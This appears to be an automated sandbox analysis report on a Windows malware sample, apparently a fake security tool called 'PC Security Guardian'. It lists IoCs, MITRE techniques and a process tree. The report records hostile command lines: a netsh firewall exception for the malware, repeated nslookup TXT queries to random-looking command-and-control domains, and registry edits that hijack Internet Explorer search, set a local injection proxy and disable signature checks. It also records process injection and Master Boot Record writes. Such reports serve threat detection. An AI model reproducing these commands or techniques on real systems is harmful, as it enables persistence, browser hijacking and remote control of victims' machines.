File opened for modification	\??\PhysicalDrive0	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3012 set thread context of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mofcomp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Internet Explorer\SearchScopes	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=196&q={searchTerms}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\ltHI = "0"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\ltTST = "20664"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Internet Explorer\IIL = "0"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=196&q={searchTerms}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=196&q={searchTerms}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=196&q={searchTerms}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Modifies registry class 15 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.DocHostUIHandler\Clsid	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.DocHostUIHandler"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Internet Explorer	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.DocHostUIHandler	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.DocHostUIHandler\ = "Implements DocHostUIHandler"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=196&q={searchTerms}"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1884	mofcomp.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92
PID 3012 wrote to memory of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92
PID 3012 wrote to memory of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92
PID 3012 wrote to memory of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92
PID 3012 wrote to memory of 1604	3012	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	92
PID 1604 wrote to memory of 1884	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	97
PID 1604 wrote to memory of 1884	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	97
PID 1604 wrote to memory of 1884	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	97
PID 1604 wrote to memory of 2624	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	98
PID 1604 wrote to memory of 2624	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	98
PID 1604 wrote to memory of 2624	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	98
PID 1604 wrote to memory of 32	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	101
PID 1604 wrote to memory of 32	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	101
PID 1604 wrote to memory of 32	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	101
PID 1604 wrote to memory of 4980	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	103
PID 1604 wrote to memory of 4980	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	103
PID 1604 wrote to memory of 4980	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	103
PID 1604 wrote to memory of 2072	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	105
PID 1604 wrote to memory of 2072	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	105
PID 1604 wrote to memory of 2072	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	105
PID 1604 wrote to memory of 1800	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	108
PID 1604 wrote to memory of 1800	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	108
PID 1604 wrote to memory of 1800	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	108
PID 1604 wrote to memory of 4132	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	110
PID 1604 wrote to memory of 4132	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	110
PID 1604 wrote to memory of 4132	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	110
PID 1604 wrote to memory of 516	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	112
PID 1604 wrote to memory of 516	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	112
PID 1604 wrote to memory of 516	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	112
PID 1604 wrote to memory of 4368	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	114
PID 1604 wrote to memory of 4368	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	114
PID 1604 wrote to memory of 4368	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	114
PID 1604 wrote to memory of 2120	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	116
PID 1604 wrote to memory of 2120	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	116
PID 1604 wrote to memory of 2120	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	116
PID 1604 wrote to memory of 2248	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	118
PID 1604 wrote to memory of 2248	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	118
PID 1604 wrote to memory of 2248	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	118
PID 1604 wrote to memory of 3492	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	120
PID 1604 wrote to memory of 3492	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	120
PID 1604 wrote to memory of 3492	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	120
PID 1604 wrote to memory of 4376	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	122
PID 1604 wrote to memory of 4376	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	122
PID 1604 wrote to memory of 4376	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	122
PID 1604 wrote to memory of 512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	124
PID 1604 wrote to memory of 512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	124
PID 1604 wrote to memory of 512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	124
PID 1604 wrote to memory of 4240	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	126
PID 1604 wrote to memory of 4240	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	126
PID 1604 wrote to memory of 4240	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	126
PID 1604 wrote to memory of 3864	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	128
PID 1604 wrote to memory of 3864	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	128
PID 1604 wrote to memory of 3864	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	128
PID 1604 wrote to memory of 2408	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	130
PID 1604 wrote to memory of 2408	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	130
PID 1604 wrote to memory of 2408	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	130
PID 1604 wrote to memory of 4512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	132
PID 1604 wrote to memory of 4512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	132
PID 1604 wrote to memory of 4512	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	132
PID 1604 wrote to memory of 2064	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	134
PID 1604 wrote to memory of 2064	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	134
PID 1604 wrote to memory of 2064	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	134
PID 1604 wrote to memory of 4620	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	136
PID 1604 wrote to memory of 4620	1604	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe	136

C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe" "C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Event Triggered Execution: Image File Execution Options Injection
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\SysWOW64\Wbem\mofcomp.exe
    mofcomp "C:\Users\Admin\AppData\Local\Temp\8456.mof"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- - C:\Windows\SysWOW64\netsh.exe
    netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe" "PC Security Guardian" ENABLE
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2624
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:32
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2072
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1800
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4132
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:516
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4368
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt jnszeenpygk1598n.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2120
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2248
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3492
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:512
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4240
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3864
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2408
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt mnp204wclmvdfops.net 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4512
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.com 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2064
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.net 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4620
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.com 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4836
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.net 208.67.222.222
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1224
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.com 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:516
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.net 8.8.4.4
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.com 208.67.220.220
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3468
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt elszbh799mnubil.net 208.67.220.220
    3⤵
